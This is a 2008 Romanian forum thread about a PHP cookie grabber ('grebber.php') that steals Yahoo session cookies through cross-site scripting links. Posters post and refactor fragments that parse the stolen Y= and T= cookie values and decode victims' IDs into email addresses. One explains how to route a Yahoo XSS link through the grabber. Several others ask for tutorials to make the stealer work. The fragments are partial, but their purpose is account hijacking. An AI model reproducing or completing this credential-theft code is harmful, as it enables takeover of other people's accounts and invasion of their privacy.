decode Posted March 4, 2008 Report Posted March 4, 2008 am si eu o intrebare pentru Nemessis:la grebber.php tot ce ai facut acolo mi se pare foarte interesant, dar ce e cu mailu ala din cod :"buni@yahoo.com"nu cumva e un e-mail de al tau?scuze daca ti se pare ca te subestimez dar buni@yahoo.com chiar exista si asta ma facut sa ma gandesc de 2 ori inainte de a folosi cookie grabberul tau. Quote
tw8 Posted March 4, 2008 Report Posted March 4, 2008 am si eu o intrebare pentru Nemessis:la grebber.php tot ce ai facut acolo mi se pare foarte interesant, dar ce e cu mailu ala din cod :"buni@yahoo.com"nu cumva e un e-mail de al tau?scuze daca ti se pare ca te subestimez dar buni@yahoo.com chiar exista si asta ma facut sa ma gandesc de 2 ori inainte de a folosi cookie grabberul tau. In caz ca ai habar cat de cat de PHP, uite lamurirea. In cod apare asa:$buni@yahoo.com&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8"]Yahoo SearchDupa cum poti vedea tot din cod (nu mai dau citat) $buni va contine la sfarsit decodarea ID-ului din cookie. Astfel, acel $buni are ca scop doar sa te ajute sa cauti pe siteurile mai folosite (google, myspace etc) conturi ale aceleiasi persoane.Bafta, si data viitoare nu te mai grabi sa tragi concluzii . Quote
Globals Posted March 5, 2008 Report Posted March 5, 2008 salut am si eu o intrebare de ce cand intru in index-ul sitului meu ... imi apare sa downloadez google_adsense.phpAsa Quote
sawyer Posted March 5, 2008 Report Posted March 5, 2008 hostingul care il ai nu suporta PHP LOL si te pune sa`l downloadezi Quote
adiacent Posted March 11, 2008 Report Posted March 11, 2008 Am si eu o rugaminte. Daca nu la restul, macar la partea cu anul, ca zgarie ochii.$year = "37";$realYear = base_convert( $year, 32, 10 ) + 1900; Quote
Globals Posted March 12, 2008 Report Posted March 12, 2008 Si pe mine sa ma ajute cineva sa imi refac grraberul .... ca nu mai merge ... si JUr ca e totu facut OK Quote
loki Posted March 13, 2008 Report Posted March 13, 2008 Am si eu o rugaminte. Daca nu la restul, macar la partea cu anul, ca zgarie ochii.$year = "37";$realYear = base_convert( $year, 32, 10 ) + 1900;eu bagai asa la restul$string1="0123456789abcdefghijklmnopqrstuvwxyz+_.";$string2="abcdefghijklmnopqrstuvwxyz0123456789 _.";for ($i=0; $i<strlen($neah); $buni.=$string2[strpos($string1,$neah[$i++])]);iar la year$year=strpos($string1,$str{1})*32+1900+strpos($string1,$str{2});Grabberele nu mor, moare xss-ul, e destul un alt link yahoo sa dea alert si ii schimbi codita sa treaca prin grabber.Partea cu mailul is curios daca ii merge cuiva de pe compul personal. Ca pan la urma am gasit pe unde e blacklisted RDS-ul de nu pleaca mailuri. Quote
adiacent Posted March 13, 2008 Report Posted March 13, 2008 pentru mail ar trebui sa ai un smtp server configurat in php.ini, fie sa folosesti un client de smtp propriu. Quote
loki Posted March 15, 2008 Report Posted March 15, 2008 pentru mail ar trebui sa ai un smtp server configurat in php.ini, fie sa folosesti un client de smtp propriu.Mie mi-a mers pana asta vara. De atunci nici windows nu am pus, php.ini e configurat ca atunci. Cu toate astea adio smtp local. Cred ca e si din cauza unui virus din-ala care a dat cu mail la toate neamurile adressbookului Quote
ciryxtr Posted October 13, 2008 Report Posted October 13, 2008 salut baieti mai are careva tutorialul ? ma refer de la cap la coada ca nu prea mai functioneaza link`urile pe site .ms Quote
menaito Posted October 14, 2008 Report Posted October 14, 2008 un tutorial despre cum pot sa`l folosesc pls ca ce am vazut aici imi da o "eroare" Invalid Forum specified. If you followed a valid link, please notify the administrator Quote
r0gu3ptm Posted October 24, 2008 Report Posted October 24, 2008 salut ma poate ajuta cineva cu acest cookie stealer ? ca unele linkuri din forum nu mai functioneaza deloc... sunt curios sa vad cum functioneaza... scopuri educative doar Quote
dblackshell Posted October 24, 2008 Report Posted October 24, 2008 alternativa ("infrumusetare cod") pentru cei ce vor :blush:if(strstr($cookie, 'v=1') and strstr($cookie, 'z=')){//-alternativa->if(!(strstr($cookie, 'v=1')&&strstr($cookie, 'z='))) exit;////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////$cookie = ereg_replace('&p=0', '', $cookie);//-alternativa->$cookie = str_replace('&p=0', '', $cookie);////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////$Y = explode('Y=', $cookie);$Y = $Y[1];$Y = explode(';', $Y);$Y = $Y[0];//-alternativa->$Y = explode('Y=', $cookie);$Y = current(explode(';', $Y[1]));////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////$T = explode('T=', $cookie);$T = $T[1];$T = explode(';', $T);$T = $T[0];//-alternativa->$T = explode('T=', $cookie);$T = current(explode(';', $T[1]));////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////$d=explode('l=', $mata, -1);$c=explode('/o', $d[1], -1);$neah=$c[0];//-alternativa->$d = explode('l=', $mata, -1);$neah = current(explode('/o', $d[1], -1));////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////for ($i=0; $i<strlen($neah); $i++){if ($neah[$i]=="0") { $buni.="a"; }if ($neah[$i]=="1") { $buni.="b"; }if ($neah[$i]=="2") { $buni.="c"; }if ($neah[$i]=="3") { $buni.="d"; }if ($neah[$i]=="4") { $buni.="e"; }...etc...//-alternativa->$val = array( '0' => 'a', '1' => 'b', '2' => 'c', '3' => 'd', '4' => 'e', ...etc...);$buni = '';foreach($neah as $value) { $buni .= $val[$value];}////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////se pot reaplica infrumusatirile ulterioare in mare parte a codului precum si$y = ereg_replace(';', '',$Y);$y = ereg_replace('&', '%26',$y);$y = ereg_replace('=', '%3D',$y);//-alternativa->$search = array(';', '&', '=');$replace = array('', '%26', '%3D');$y = str_replace($search, $replace, $Y);//-alternativa--my-fav-(arata misto)->$y = str_replace( ';', '', str_replace( '&', '%26', str_replace( '=', '%3D', $Y ) ));//vam zis ca arata misto Quote
dblackshell Posted October 25, 2008 Report Posted October 25, 2008 off topicnu am putut sa iti trimit pm (cica nu permiti/ai drept)... daca vrei sa aflii mailu meu cred ca google te va ajuta (insanesecurity parca )... Quote
r0gu3ptm Posted October 25, 2008 Report Posted October 25, 2008 si un tutorial ceva sa ne lamurim si noi cum facem aceast cookie stealer sa mearga ? eu unul nu am reusit sa-l fac sa mearga... Quote
Hellbound Posted October 25, 2008 Report Posted October 25, 2008 nici eu insanesecurity al lasat comm Quote
piratugsm Posted November 11, 2008 Report Posted November 11, 2008 Am nevoie daca se poate, un link catre script (si pt tutorial la fel) va rog ... Quote
xenolith Posted December 9, 2008 Report Posted December 9, 2008 omg, scriptu e inca pe post, tutorialu ma intereseaza pe mine Quote
flaviusone Posted December 17, 2008 Report Posted December 17, 2008 dap un tutorial ar fi foarte folositor tnx Quote